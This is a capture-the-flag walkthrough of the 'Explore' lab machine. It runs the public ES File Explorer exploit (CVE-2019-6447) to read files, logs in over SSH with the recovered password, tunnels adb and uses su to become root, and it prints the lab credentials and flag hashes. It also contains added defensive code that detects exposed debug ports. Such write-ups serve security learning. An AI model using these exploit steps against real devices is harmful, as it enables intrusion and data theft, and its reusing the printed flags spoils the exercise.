Explore


Enumeration


As usual, let's start with nmap:

nmap -sV -Pn -p- 10.10.10.247

I googled the following:

  • port 5555 android --> adb (Android Debug Bridge)

  • port 5977 android --> found out there is an Android vulnerability in ES File Explorer, CVE-2019-6447. Basically this vulnerability allows attackers on the same network to execute applications and read files on the Android device!


From your attacking machine, do the following:

Go to exploit database https://www.exploit-db.com/

Click on Search EDB

and type 2019-6447 in the CVE field

Click on the exploit

Download the exploit


Go to your Downloads folder:

cd Downloads
ls

Let's try to run this exploit using:

python3 50070.py

Looks like we need to supply a command followed by the target IP. If we go back to the exploit's page on exploit-db, it tells us the listPics command lists all the pictures on the Android device, so let's try that:

python3 50070.py listPics 10.10.10.247

Looks like there is an interesting picture called creds.jpg.

Let's try to get this file using getFile:

python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The file has been downloaded to our machine as out.dat, so let's check it out.

When we open the file we see the following:

Looks like a password for the username kristi:

Kr1sT!5h@Rp3xPl0r3!


We can see from the nmap scan that port 2222 is open, which is SSH. So let's try to SSH in using these credentials:

ssh kristi@10.10.10.247 -p 2222

Type yes and press Enter, then enter the password we just found:

Kr1sT!5h@Rp3xPl0r3!

We are in!

id

ls

cd sdcard
ls

cat user.txt

f32017174c7c7e8f50c6da52891ae250


Congratulations! You got the user flag!



cd ..
ls

Let's find out which ports the Android device is listening on by typing:

netstat -tulpn | grep LISTEN

We can see that port 5555 is listening.
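The same netstat check is also the defender's check: an adb or ES File Explorer listener bound to every interface is exactly what made this box reachable. Below is an added example (my own code, not part of the writeup) that parses netstat-style LISTEN lines and flags the two ports the writeup identifies when they are bound to something other than loopback. The sample output is constructed in Linux netstat format for this example, not captured from the box; the port-to-risk mapping is taken from the writeup's own notes.

```python
# Added example (not from the original writeup): parse `netstat -tulpn` style output
# and flag debug/management services that are reachable from the network.
from typing import Dict, List, Tuple

# Constructed sample in Linux netstat layout; not real output from the target.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      -
tcp        0      0 :::5555                 :::*                    LISTEN      -
tcp        0      0 127.0.0.1:5037          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::5977                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
"""

# Ports the writeup calls out, and why they matter (CVE number as given on the page).
RISKY_PORTS: Dict[int, str] = {
    5555: "adb (Android Debug Bridge) over TCP: shell access to the device",
    5977: "ES File Explorer HTTP service (CVE-2019-6447): file read / app launch from the same network",
}

# Bind addresses that mean "every interface".
WILDCARD_HOSTS = {"0.0.0.0", "::", "*"}


def parse_listeners(text: str) -> List[Tuple[str, str, int]]:
    """Return (proto, bind_host, port) for every row in LISTEN state."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # Data rows look like: proto recv-q send-q local foreign [state] [pid/program]
        if len(fields) < 6 or not fields[0].startswith(("tcp", "udp")):
            continue
        if "LISTEN" not in fields:
            continue  # UDP rows carry no state column; only TCP listeners matter here
        # rpartition handles both "0.0.0.0:2222" and the IPv6 form ":::5555"
        host, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        listeners.append((fields[0], host, int(port)))
    return listeners


def find_exposed_debug_ports(text: str) -> List[Dict[str, object]]:
    """Flag known-risky listeners that are bound to anything other than loopback."""
    findings = []
    for proto, host, port in parse_listeners(text):
        if port not in RISKY_PORTS:
            continue
        if host.startswith("127.") or host == "::1":
            continue  # loopback-only services are not reachable from the network
        findings.append({
            "proto": proto,
            "bind": host,
            "port": port,
            "exposed_to": "all interfaces" if host in WILDCARD_HOSTS else host,
            "why": RISKY_PORTS[port],
        })
    return findings


if __name__ == "__main__":
    for f in find_exposed_debug_ports(SAMPLE_NETSTAT):
        print(f"[!] {f['proto']} {f['bind']}:{f['port']} ({f['exposed_to']}) - {f['why']}")
```

Run it against real output with `netstat -tulpn | python3 check_listeners.py` after swapping `SAMPLE_NETSTAT` for `sys.stdin.read()`; anything it prints is a service that should either be bound to loopback or switched off.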



Port forwarding

What is local port forwarding?

Local port forwarding is configured using the -L option:

    ssh -L 5555:machine2:5555 machine1

This opens an SSH connection to machine1. Any connection made to port 5555 on your own machine (the SSH client) is carried over that connection, and machine1 delivers it to port 5555 on machine2. If machine2 is "localhost", the destination is port 5555 on machine1 itself.


For our case let's use it and type:

    ssh -L 5555:localhost:5555 kristi@IP -p 2222

This opens an SSH connection to the HTB target machine (Explore) and forwards any connection to port 5555 on my localhost (the VM) to port 5555 on the target machine.
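To make the -L option concrete, here is an added example (my own code, not from the writeup and not part of the box) that does in plain Python what the SSH client does for a -L forward: listen on a local port and relay each accepted connection to a destination. SSH encrypts and tunnels the relayed bytes; this toy relays them in the clear, which is enough to show the data flow. The echo server is an assumption of the example, standing in for the service on the far side.

```python
# Added example (not from the original writeup): a minimal local port forwarder,
# the plain-socket equivalent of `ssh -L LPORT:HOST:RPORT` without the SSH layer.
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until the source closes, then half-close the destination."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(listen_port: int, target_host: str, target_port: int,
                    bind_host: str = "127.0.0.1"):
    """Listen on bind_host:listen_port and relay each connection to target_host:target_port.

    Returns (listening socket, port actually bound). Binding to 127.0.0.1 mirrors
    the SSH default: only the local machine can use the forwarded port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, listen_port))
    srv.listen(5)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return  # listener closed
            try:
                remote = socket.create_connection((target_host, target_port), timeout=5)
            except OSError:
                client.close()
                continue
            # one thread per direction, exactly like the two halves of an SSH channel
            threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pump, args=(remote, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_echo_server():
    """Assumed stand-in for the far-side service: echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def roundtrip(payload: bytes) -> bytes:
    """Send payload to the forwarder's local port and return what the far side echoed back."""
    echo, echo_port = start_echo_server()
    fwd, fwd_port = start_forwarder(0, "127.0.0.1", echo_port)
    try:
        with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # we are done sending; wait for the reply and EOF
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        fwd.close()
        echo.close()


if __name__ == "__main__":
    print(roundtrip(b"hello through the local forward"))
```

The client only ever talks to 127.0.0.1 on the forwarder's port, which is why, after `ssh -L 5555:localhost:5555 ...`, `adb connect localhost:5555` on the VM reaches the adb service on the target.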


We know that our target (htb machine) is listening on port 5555 (netstat told us)



Open a new command prompt on your VM

ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222

Enter the password we found earlier

Kr1sT!5h@Rp3xPl0r3!



adb


ADB (Android Debug Bridge) is a command-line tool that allows you to communicate with an Android device. It is used mainly by developers to install and debug apps, and it also comes with a Unix shell that can be used to run commands on the device.


An Android device emulator is a virtual device that runs on your computer and allows you to develop and test your Android app without using a physical Android device.


Open a new command prompt on your VM and install adb:

sudo apt install adb

Press Y to continue.

If the first attempt fails, update the package lists and try again:

sudo apt-get update
sudo apt install adb

Press Y to continue.

This time it worked: adb has been installed successfully.


adb devices

adb connect localhost:5555

adb devices

Now that the device is listed, open a shell on it. With a single device attached a plain adb shell is enough; otherwise select the device by its serial (host:port) with -s:

adb shell
adb -s localhost:5555 shell

whoami

su

The su command switches to the super user, i.e. root.

whoami

We are now root!


ls

cd data
ls

cat root.txt

f04fc82b6d49b41c9b08982be59338c5


Congratulations! You got the root flag!
